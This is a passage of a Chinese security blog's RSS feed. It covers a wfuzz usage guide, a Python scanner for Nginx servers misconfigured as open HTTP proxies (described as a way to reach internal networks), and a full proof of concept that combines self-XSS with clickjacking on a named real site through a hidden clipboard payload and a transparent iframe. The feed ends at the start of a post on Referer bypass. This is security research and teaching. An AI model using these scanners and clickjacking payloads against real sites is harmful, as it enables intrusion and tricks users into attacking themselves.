  default         | none                         | 不进行任何编码
  hashes         | sha1                        | 将字符串进行sha1加密
  url             | utf8_binary                | 将字符串中的所有字符以 `\uxx` 形式进行编码
  url             | uri_triple_hex             | 将所有字符以`%25%xx%xx` 格式进行编码
  url             | uri_unicode                | 将所有字符以`%u00xx` 格式进行编码
  html             | html_decimal                | 将所有字符以 `&amp;amp;#dd; ` 格式进行编码
  db             | oracle_char                | 将所有字符转换为Oracle语法的`chr(xx)`形式
  db             | mysql_char                 | 将所有字符转换为MySQL语法的`char(xx)`形式
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;iterator&quot;&gt;iterator&lt;/h4&gt;

&lt;p&gt;wfuzz的iterator提供了针对多个payload的处理方式。
itorators的列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available iterators:

  Name    | Summary
----------------------------------------------------------------------------------------------
  product | Returns an iterator cartesian product of input iterables.
  zip     | Returns an iterator that aggregates elements from each of the iterables.
  chain   | Returns an iterator returns elements from the first iterable until it is exhaust
          | ed, then proceeds to the next iterable, until all of the iterables are exhausted
          | .
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;printer&quot;&gt;printer&lt;/h4&gt;

&lt;p&gt;wfuzz的printers用于控制输出打印。
printers列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available printers:
  Name      | Summary                             
--------------------------------------------------
  raw       | `Raw` output format
  json      | Results in `json` format
  csv       | `CSV` printer ftw
  magictree | Prints results in `magictree` format
  html      | Prints results in `html` format
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;scripts&quot;&gt;scripts&lt;/h4&gt;

&lt;p&gt;scripts列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available scripts:
  Category                   | Name          | Summary
----------------------------------------------------------------------------------------------------
  default, passive           | cookies       | 查找新的cookies
  default, passive           | errors        | 查找错误信息
  passive                    | grep          | HTTP response grep
  active                     | screenshot    | 用linux cutycapt tool 进行屏幕抓取 
  default, active, discovery | links         | 解析HTML并查找新的内容
  default, active, discovery | wc_extractor  | 解析subversion的wc.db文件
  default, passive           | listing       | 查找列目录漏洞
  default, passive           | title         | 解析HTML页面的title
  default, active, discovery | robots        | 解析robots.txt文件来查找新内容
  default, passive           | headers       | 查找服务器的返回头
  default, active, discovery | cvs_extractor | 解析 CVS/Entries 文件
  default, active, discovery | svn_extractor | 解析 .svn/entries 文件
  active, discovery          | backups       | 查找已知的备份文件名
  default, active, discovery | sitemap       | 解析 sitemap.xml 文件
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;内置工具&quot;&gt;内置工具&lt;/h3&gt;

&lt;h4 id=&quot;wfencode-工具&quot;&gt;wfencode 工具&lt;/h4&gt;

&lt;p&gt;这是wfuzz自带的一个加密/解密（编码/反编码）工具，目前支持内建的encoders的加/解密。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfencode -e base64 123456
[RES] MTIzNDU2
wfencode -d base64 MTIzNDU2
[RES] 123456
&lt;/code&gt;&lt;/pre&gt;

&lt;hr /&gt;

&lt;h4 id=&quot;wfpayload工具&quot;&gt;wfpayload工具&lt;/h4&gt;

&lt;p&gt;wfpayload是payload生成工具&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfpayload -z range,0-10
[RES]
0
1
2
3
4
5
6
7
8
9
10
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;wxfuzz-工具&quot;&gt;wxfuzz 工具&lt;/h4&gt;

&lt;p&gt;这个看源码是一个wxPython化的wfuzz，也就是GUI图形界面的wfuzz。目前需要wxPython最新版本才能使用，但是在ParrotOS和Kali上都无法正常安装成功，问题已在GitHub提交Issue，期待开发者的回复中…&lt;/p&gt;

&lt;h3 id=&quot;wfuzz命令中文帮助&quot;&gt;wfuzz命令中文帮助&lt;/h3&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Usage:    wfuzz [options] -z payload,params &amp;lt;url&amp;gt;
    FUZZ, ..., FUZnZ              payload占位符，wfuzz会用指定的payload代替相应的占位符，n代表数字. 
    FUZZ{baseline_value}     FUZZ 会被 baseline_value替换，并将此作为测试过程中第一个请求来测试，可用来作为过滤的一个基础。
Options:
    -h/--help            : 帮助文档
    --help                : 高级帮助文档
    --version            : Wfuzz详细版本信息
    -e &amp;lt;type&amp;gt;            :  显示可用的encoders/payloads/iterators/printers/scripts列表
    --recipe &amp;lt;filename&amp;gt;        : 从文件中读取参数
    --dump-recipe &amp;lt;filename&amp;gt;    : 打印当前的参数并保存成文档
    --oF &amp;lt;filename&amp;gt;               : 将测试结果保存到文件，这些结果可被wfuzz payload 处理
    -c                : 彩色化输出
    -v                : 详细输出
    -f filename,printer         : 将结果以printer的方式保存到filename (默认为raw printer).
    -o printer                  : 输出特定printer的输出结果
    --interact            : (测试功能) 如果启用，所有的按键将会被捕获，这使得你能够与程序交互
    --dry-run            : 打印测试结果，而并不发送HTTP请求
    --prev                : 打印之前的HTTP请求（仅当使用payloads来生成测试结果时使用）
    -p addr                : 使用代理，格式 ip:port:type. 可设置多个代理，type可取的值为SOCKS4,SOCKS5 or HTTP（默认）
    -t N                : 指定连接的并发数，默认为10
    -s N                : 指定请求的间隔时间，默认为0
    -R depth            : 递归路径探测，depth指定最大递归数量
    -L,--follow            : 跟随HTTP重定向
    -Z                : 扫描模式 (连接错误将被忽视).
    --req-delay N            : 设置发送请求允许的最大时间，默认为 90，单位为秒.
    --conn-delay N              : 设置连接等待的最大时间，默认为 90，单位为秒.
    -A                : 是 --script=default -v -c 的简写
    --script=            : 与 --script=default 等价
    --script=&amp;lt;plugins&amp;gt;        : 进行脚本扫描， &amp;lt;plugins&amp;gt; 是一个以逗号分开的插件或插件分类列表
    --script-help=&amp;lt;plugins&amp;gt;        : 显示脚本的帮助
    --script-args n1=v1,...     : 给脚本传递参数. ie. --script-args grep.regex=&quot;&amp;lt;A href=\&quot;(.*?)\&quot;&amp;gt;&quot;
    -u url                      : 指定请求的URL
    -m iterator            : 指定一个处理payloads的迭代器 (默认为product)
    -z payload            : 为每一个占位符指定一个payload，格式为 name[,parameter][,encoder].
                      编码可以是一个列表, 如 md5-sha1. 还可以串联起来, 如. md5@sha1.
                      还可使用编码各类名，如 url
                                      使用help作为payload来显示payload的详细帮助信息，还可使用--slice进行过滤
    --zP &amp;lt;params&amp;gt;            : 给指定的payload设置参数。必须跟在 -z 或-w 参数后面
    --slice &amp;lt;filter&amp;gt;        : 以指定的表达式过滤payload的信息，必须跟在-z 参数后面
    -w wordlist            : 指定一个wordlist文件，等同于 -z file,wordlist
    -V alltype            : 暴力测试所有GET/POST参数，无需指定占位符
    -X method            : 指定一个发送请求的HTTP方法，如HEAD或FUZZ
    -b cookie            : 指定请求的cookie参数，可指定多个cookie
    -d postdata             : 设置用于测试的POST data (ex: &quot;id=FUZZ&amp;amp;catalogue=1&quot;)
    -H header              : 设置用于测试请求的HEADER (ex:&quot;Cookie:id=1312321&amp;amp;user=FUZZ&quot;). 可指定多个HEADER.
    --basic/ntlm/digest auth    : 格式为 &quot;user:pass&quot; or &quot;FUZZ:FUZZ&quot; or &quot;domain\FUZ2Z:FUZZ&quot;
    --hc/hl/hw/hh N[,N]+        : 以指定的返回码/行数/字数/字符数作为判断条件隐藏返回结果 (用 BBB 来接收 baseline)
    --sc/sl/sw/sh N[,N]+        : 以指定的返回码/行数/字数/字符数作为判断条件显示返回结果 (用 BBB 来接收 baseline)
    --ss/hs regex            : 显示或隐藏返回结果中符合指定正则表达式的返回结果
    --filter &amp;lt;filter&amp;gt;        : 显示或隐藏符合指定filter表达式的返回结果 (用 BBB 来接收 baseline)
    --prefilter &amp;lt;filter&amp;gt;        : 用指定的filter表达式在测试之前过滤某些测试条目
&lt;/code&gt;&lt;/pre&gt;
</description>
          <pubDate>2018-10-28T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-10-28/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-10-28/1</guid>
        </item>
      
    
      
        <item>
          <title>刺透内网的HTTP代理</title>
          <description>&lt;h1 id=&quot;从偶然出发&quot;&gt;从偶然出发&lt;/h1&gt;

&lt;p&gt;在做测试的时候发现了这样一个漏洞，原请求报文如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;GET / HTTP/1.1
Host: attack_website
[... HEADER ...]

...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;当时最初目的是想测SSRF的，但是经过测试没发现存在漏洞后来想起之前看过的一些漏洞案例，将请求报文中的URI部分替换成了网址：&lt;/p&gt;

&lt;p&gt;http://gh0st.cn&lt;/p&gt;

&lt;p&gt;就变成了如下的请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;GET http://gh0st.cn HTTP/1.1
Host: attack_website
[... HEADER ...]

...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在BurpSuite里进行重放测试发现返回的响应正文就是 http://gh0st.cn 的，也就是说这里的attack_website可以被作为HTTP代理，于是进入下一步的测试能否使用非http/https协议进行请求？例如file:///，测试后发现确实没办法这样玩，看来是这里代理服务器不支持。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;在这里替换URI部分为内网的地址，可以直接漫游内网的系统，进行深入的渗透测试了，后续的事情就不在这多说了，那么来研究看看为什么会有这样的问题呢？&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&quot;从被动偶然到主动发现&quot;&gt;从被动偶然到主动发现&lt;/h2&gt;

&lt;h3 id=&quot;了解原理&quot;&gt;了解原理&lt;/h3&gt;

&lt;p&gt;查阅了一番资料和询问了一下朋友，都说具体的不太清楚，后来看见这样一篇文章：&lt;/p&gt;

&lt;p&gt;https://www.secpulse.com/archives/74676.html&lt;/p&gt;

&lt;p&gt;其中所说原理大致是因为Nginx反向代理配置不当导致可以被作为正向代理，导致能被外部作为HTTP代理服务器。&lt;/p&gt;

&lt;h4 id=&quot;正向代理-and-反向代理&quot;&gt;正向代理 and 反向代理&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;正向代理&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;浏览器（/全局）设置代理服务器IP和对应端口&lt;/li&gt;
  &lt;li&gt;浏览器输入目标地址-&amp;gt;代理服务器-&amp;gt;目标服务器&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;简而言之，正向代理类似我们经常用到的跳板机，利用代理去访问外部的资源。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-09-11/0x00.png&quot; alt=&quot;proxy&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;反向代理&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;跟正代不同的地方在于反向代理相对浏览器来说是透明的，不需要在浏览器（/全局）做什么配置，而是有反向代理服务器自己做请求转发到其服务器上所配置的地址。&lt;/p&gt;

&lt;p&gt;大致如下的流程：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;浏览器访问网站（网站所指即反向代理服务器）&lt;/li&gt;
  &lt;li&gt;网站（反向代理服务器）做处理，将请求转发给所设置的目标服务器&lt;/li&gt;
  &lt;li&gt;由请求最终到达的目标服务器响应给网站（反向代理服务器），然后再通过其返回给浏览器&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-09-11/0x01.png&quot; alt=&quot;proxy&quot; /&gt;&lt;/p&gt;

&lt;p&gt;TIPs：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;一、反向代理服务器也可以变成WAF（例如Nginx支持反代功能，nginx+lua也可以搭建网站waf）&lt;/li&gt;
  &lt;li&gt;二、反向代理服务器也可以起到负载均衡的作用，由反向代理服务器做选择分配Web服务器&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;主动发现脚本开发&quot;&gt;主动发现脚本开发&lt;/h2&gt;

&lt;p&gt;脚本语言选择：python2.7&lt;/p&gt;

&lt;p&gt;系统环境：all&lt;/p&gt;

&lt;h3 id=&quot;思考&quot;&gt;思考&lt;/h3&gt;

&lt;p&gt;如何判断这个网站存在可以作为HTTP代理访问资源？唯一特征是什么？&lt;/p&gt;

&lt;p&gt;脑子中唯一的思路就是IP，如果这目标站点能作为HTTP代理访问资源，那么我设置的这个资源就是返回真实IP的，这样就可以判断了～&lt;/p&gt;

&lt;p&gt;这里我在团队官网上小小的写了一个，但是在大批量去测试却无法使用，因为官网的空间没那么大的吞吐量，承载不住高并发，后期建议大家使用 http://httpbin.org/ip 这个接口～&lt;/p&gt;

&lt;p&gt;http://www.hi-ourlife.com/getip.php&lt;/p&gt;

&lt;p&gt;PHP代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
echo $_SERVER[&apos;REMOTE_ADDR&apos;];
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;代码构建&quot;&gt;代码构建&lt;/h3&gt;

&lt;p&gt;Import 库&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;import urllib, sys, re, json
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;全局变量：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;poc = &quot;http://www.hi-ourlife.com/getip.php&quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;获取使用代理访问资源后内容（IP）函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def useProxy(site):
	try:
		res = urllib.urlopen(poc, proxies={&apos;http&apos;: site}).read()
		return res
	except:
		return getIP()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;正常本机获取IP函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def getIP():
	res = urllib.urlopen(poc).read()
	return res
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;防止有些会出错返回的内容不是IP，其实返回不是IP也就间接证明不存在这种漏洞，所以需要写个正则来匹配，这时候判断是否是IP的函数就诞生了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def isIP(ip):
    compileIP = re.compile(&apos;^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$&apos;)
    if compileIP.match(ip):
        return True
    else:
        return False
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;对比IP函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def isVul(site):
	resA = getIP()
	#print resA
	resB = useProxy(site)
	#print resB
	if resA == resB or not isIP(resB):
		print &quot;\033[1;33m[INFO]\033[0m No Vulnerability!&quot;
	else:
		print &quot;\033[1;31m[INFO]\033[0m Existing Vulnerability!&quot;
		print &quot;\033[1;36m[INFO]\033[0m Site:[ {0} ] -&amp;gt; RealIP:[ {1} ]&quot;.format(site, resB)
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;单线程批量&quot;&gt;单线程批量&lt;/h3&gt;

&lt;p&gt;从扫描器里把代码模板剥离了出来如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;#-*- coding:utf-8 -*-
#Author: Vulkey_Chen

import urllib, sys, re

poc = &quot;http://www.hi-ourlife.com/getip.php&quot;

def useProxy(site):
	try:
		res = urllib.urlopen(poc, proxies={&apos;http&apos;: site}).read()
		return res
	except:
		return getIP()

def getIP():
	res = urllib.urlopen(poc).read()
	return res

def getSite(filename):
	f = open(filename)
	res = []
	for line in f:
		res.append(line)
	return res

def isIP(ip):
    compileIP = re.compile(&apos;^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$&apos;)
    if compileIP.match(ip):
        return True
    else:
        return False

def isVul(site):
	resA = getIP()
	#print resA
	resB = useProxy(site)
	#print resB
	if resA == resB or not isIP(resB):
		print &quot;\033[1;33m[INFO]\033[0m No Vulnerability!&quot;
	else:
		print &quot;\033[1;31m[INFO]\033[0m Existing Vulnerability!&quot;
		print &quot;\033[1;36m[INFO]\033[0m Site:[ {0} ] -&amp;gt; RealIP:[ {1} ]&quot;.format(site, resB)

def main(filename):
	for i in getSite(filename):
		isVul(i.replace(&quot;\n&quot;,&quot;&quot;))

if __name__ == &apos;__main__&apos;:
	main(sys.argv[1])
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-09-11/0x02.png&quot; alt=&quot;res&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;end&quot;&gt;END&lt;/h1&gt;

&lt;p&gt;使用方法：python proxy_vul.py urls.txt&lt;/p&gt;

&lt;p&gt;urls.txt 格式：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-txt&quot;&gt;http://www.hi-ourlife.com/
https://gh0st.cn/
http://mst.hi-ourlife.com:8080/
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;建议批量方法：&lt;/p&gt;

&lt;p&gt;扫描所有想检测站点的web服务端口（Nginx容器存在此类问题居多），然后使用脚本检测。&lt;/p&gt;

</description>
          <pubDate>2018-09-11T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-09-11/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-09-11/1</guid>
        </item>
      
    
      
        <item>
          <title>组合拳出击-Self型XSS变废为宝</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;作者：Vulkey_Chen&lt;/p&gt;

&lt;p&gt;博客：gh0st.cn&lt;/p&gt;

&lt;p&gt;这是一个鸡肋性质的研究，也许有些标题党，请见谅～&lt;/p&gt;

&lt;p&gt;本文启发于一些讨论，和自己脑子里冒出来的想法。&lt;/p&gt;

&lt;h1 id=&quot;组合拳搭配&quot;&gt;组合拳搭配&lt;/h1&gt;

&lt;h2 id=&quot;self型xss&quot;&gt;Self型XSS&lt;/h2&gt;

&lt;p&gt;已知Self型XSS漏洞是这样的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-28/0x00.png&quot; alt=&quot;self-xss&quot; /&gt;&lt;/p&gt;

&lt;p&gt;相信看见图片基本上已经知道这个漏洞形成的原因了，该功能点有一个编辑预览的，输入XSS的payload就触发。&lt;/p&gt;

&lt;p&gt;局限点在于这个漏洞是Self型(Myself)，也就是只能自己输入-&amp;gt;自己触发漏洞。&lt;/p&gt;

&lt;h2 id=&quot;变换思考&quot;&gt;变换思考&lt;/h2&gt;

&lt;p&gt;重新理一下这个漏洞触发的流程：&lt;/p&gt;

&lt;p&gt;1.输入XSS payload:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;svg/onload=alert(1)&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;2.触发&lt;/p&gt;

&lt;p&gt;那么是否也可以理解为这样的一个触发流程：&lt;/p&gt;

&lt;p&gt;1.XSS payload就在剪贴板中&lt;/p&gt;

&lt;p&gt;2.黏贴到文本框&lt;/p&gt;

&lt;p&gt;3.触发&lt;/p&gt;

&lt;p&gt;也就是说在这里我只需要沿着这个流程向下拓展，是否可以让我变换的触发流程文字变成代码形式。&lt;/p&gt;

&lt;h3 id=&quot;顺推流程&quot;&gt;顺推流程&lt;/h3&gt;

&lt;p&gt;触发流程顺推为&lt;strong&gt;攻击流程&lt;/strong&gt;：&lt;/p&gt;

&lt;p&gt;1.诱导受害者点开连接&lt;/p&gt;

&lt;p&gt;2.诱导受害者点击复制按钮&lt;/p&gt;

&lt;p&gt;3.诱导受害者黏贴剪贴板的内容&lt;/p&gt;

&lt;p&gt;4.顺利触发XSS漏洞&lt;/p&gt;

&lt;p&gt;这一切的攻击流程看起来可操作性并不强，但实际上还是会有很多人中招。&lt;/p&gt;

&lt;h3 id=&quot;搭配谁&quot;&gt;搭配谁？&lt;/h3&gt;

&lt;p&gt;以上的攻击流程都需要在同一个页面中触发，那么就需要一个点击劫持的配合。&lt;/p&gt;

&lt;p&gt;“&lt;strong&gt;上天总是眷顾长得帅的人&lt;/strong&gt;”，在这里确实也存在着点击劫持的问题：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-28/0x01.png&quot; alt=&quot;http-response&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;代码思考构建&quot;&gt;代码思考&amp;amp;构建&lt;/h3&gt;

&lt;h4 id=&quot;复制功能&quot;&gt;复制功能&lt;/h4&gt;

&lt;p&gt;按流程来构建，首先构建复制到剪贴板的功能：&lt;/p&gt;

&lt;p&gt;JavaScript有这样的功能，代码如下，自行 ”&lt;strong&gt;食&lt;/strong&gt;“ 用：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script type=&quot;text/javascript&quot;&amp;gt;
function cpy(){
	var content=document.getElementById(&quot;test&quot;);//获取id为test的对象
	content.select();//全选内容
	document.execCommand(&quot;Copy&quot;);//执行复制命令到剪贴板
}
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;HTML代码如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;input type=&quot;text&quot; id=&quot;test&quot; value=&apos;&amp;lt;svg/onload=alert(1)&amp;gt;&apos;&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;input type=&quot;submit&quot; value=&quot;test&quot; onclick=&quot;cpy()&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;界面如下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-28/0x02.png&quot; alt=&quot;view&quot; /&gt;&lt;/p&gt;

&lt;p&gt;问题：&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;虽然作为一个PoC来说，不需要那么苛刻的要求PoC的严谨性，但这里处于研究探索的目的还是需要解决问题，如果input标签的内容显示出来，那么就很容易暴露本身的攻击。&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;针对这类问题一开始我想到的是使用hidden属性构建为如下的HTML代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;input type=&quot;hidden&quot; id=&quot;test&quot; value=&apos;&amp;lt;svg/onload=alert(1)&amp;gt;&apos;&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;input type=&quot;submit&quot; value=&quot;test&quot; onclick=&quot;cpy()&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;经过测试发现并不能成功的使用复制功能，我的理解是因为在JavaScript代码中有这样一段内容：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;...
content.select();//全选内容
...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;既然是全选内容那么一定要有这样一个编辑框或者输入框的存在，所以使用Hidden从实际意义上是没有这样一个”&lt;strong&gt;框&lt;/strong&gt;“的。&lt;/p&gt;

&lt;p&gt;解决问题：&lt;/p&gt;

&lt;p&gt;在这里我选择使用透明样式来从”&lt;strong&gt;视觉上隐藏&lt;/strong&gt;“标签：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;style type=&quot;text/css&quot;&amp;gt;
#test { /*css id选择器*/
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
&amp;lt;/style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;那么界面就变成如下的样子了：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-28/test.gif&quot; alt=&quot;test&quot; /&gt;&lt;/p&gt;

&lt;p&gt;注意：&lt;strong&gt;这里没办法使用自动复制到剪贴板，必须需要一个按钮才行&lt;/strong&gt;&lt;/p&gt;

&lt;h4 id=&quot;点击劫持&quot;&gt;点击劫持&lt;/h4&gt;

&lt;p&gt;点击劫持之前写过一篇文章，所以就不在做讲解了，参考我之前写的一篇文章：http://gh0st.cn/archives/2017-12-20/1&lt;/p&gt;

&lt;p&gt;构建基本CSS样式：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-css&quot;&gt;.testframe {
	height: 100%;
} 
iframe {
	height: 100%;
	width: 100%;
	border: 0;
	margin: 0;
	padding: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
#submit {
    position: fixed;
    width: 614px;
    height: 30px;
    margin: 0 auto;
    left: 0;
    right: 550px;
    display: block;
    top: 640px;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;iframe框架&amp;amp;&amp;amp;输入框：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;div class=&quot;testframe&quot;&amp;gt;
    &amp;lt;iframe src=&quot;https://website/New&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
    &amp;lt;input type=&quot;text&quot; id=&quot;submit&quot;&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;最终poc&quot;&gt;最终PoC&lt;/h4&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style type=&quot;text/css&quot;&amp;gt; 
.testframe {
	height: 100%;
} 
iframe {
	height: 100%;
	width: 100%;
	border: 0;
	margin: 0;
	padding: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
#test {
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
#submit {
    position: fixed;
    width: 614px;
    height: 30px;
    margin: 0 auto;
    left: 0;
    right: 550px;
    display: block;
    top: 640px;
}
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;input type=&quot;text&quot; id=&quot;test&quot; value=&apos;&amp;lt;svg/onload=alert(1)&amp;gt;&apos;&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;input type=&quot;submit&quot; value=&quot;test&quot; onclick=&quot;cpy()&quot;&amp;gt;
&amp;lt;div class=&quot;testframe&quot;&amp;gt;
    &amp;lt;input type=&quot;text&quot; id=&quot;submit&quot;&amp;gt;
	&amp;lt;iframe id=&quot;test0&quot; src=&quot;https://secquan.org/New&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;script type=&quot;text/javascript&quot;&amp;gt;
function cpy(){
    var content=document.getElementById(&quot;test&quot;);
    content.select();
    document.execCommand(&quot;Copy&quot;);
}
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;最终演示&quot;&gt;最终演示&lt;/h2&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-08-28/poc.gif&quot; alt=&quot;poc&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;总结&quot;&gt;总结&lt;/h1&gt;

&lt;p&gt;比较打开脑洞的一次研究，苛刻的攻击条件其实在进行足够的丰富诱导下就会变得非常的有趣。&lt;/p&gt;
</description>
          <pubDate>2018-08-28T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-08-28/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-08-28/1</guid>
        </item>
      
    
      
        <item>
          <title>GET请求Referer限制绕过总结</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;在做测试的时候会遇见这样几个漏洞场景：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;JSONP跨域劫持&lt;/li&gt;
  &lt;li&gt;反射XSS&lt;/li&gt;
  &lt;li&gt;GET请求类型攻击&lt;/li&gt;
&lt;/ol&gt;

